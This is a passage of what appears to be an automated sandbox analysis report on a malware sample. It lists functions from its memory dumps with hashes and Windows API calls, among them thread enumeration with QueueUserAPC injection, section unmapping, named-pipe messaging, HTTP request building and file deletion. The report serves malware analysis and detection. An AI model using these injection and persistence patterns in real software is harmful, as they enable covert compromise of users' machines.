  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
